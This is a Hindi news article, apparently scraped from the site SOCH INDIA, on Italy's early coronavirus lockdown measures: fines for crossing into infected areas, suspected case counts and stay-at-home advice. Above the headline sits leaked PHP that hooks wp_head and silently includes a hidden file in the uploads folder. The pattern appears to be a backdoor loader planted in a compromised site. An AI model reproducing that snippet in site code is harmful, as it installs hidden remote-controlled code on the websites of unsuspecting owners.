add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); टली में कोरोना वायरस से दहशत, प्रभावित इलाकों में कड़ी पाबंदी, स्कूल-दुकानें बंद – SOCH INDIA
Menu

देश
टली में कोरोना वायरस से दहशत, प्रभावित इलाकों में कड़ी पाबंदी, स्कूल-दुकानें बंद

nobanner

कोरोना वायरस की दहशत अब यूरोप में पांव पसार चुकी है. यूरोपीय देश भी कोरोना वायरस संक्रमण के संभावित खतरों से डरे हुए हैं और अलर्ट पर हैं. यूरोप के देशों में कोरोना वायरस से इटली सबसे ज्यादा प्रभावित है. इटली के अधिकारियों ने कोरना वायरस पर सुरक्षात्मक रुख अपनाते हुए रविवार को कुछ कड़े फैसले किए हैं. अगर कोई भी शख्स कोरोना वायरस संक्रमित इलाकों में दाखिल होगा या बाहर होगा तो उसे फाइन देना होगा.

इटली ने कड़े प्रतिबंधों को तब लागू किया जब कोरोना वायरस से हुई मौतों की पुष्टि हुई, जिसके बाद यह खबर पूरे यूरोप में फैल गई. गार्जियन टाइम्स के मुताबिक इटली में कोरोना वायरस के संक्रमण के 152 संदिग्ध मामले सामने आए हैं.

इटली पुलिस 11 कोरोना वायरस संक्रमित इलाकों में पेट्रोलिंग कर रही है. लोम्बार्डी इलाके में भी प्रशासन अलर्ट पर है. इटली में करीब 50,000 परिवारों से कहा गया है कि अपने घरों में कैद रहें और सामाजिक गतिविधियां कम करें.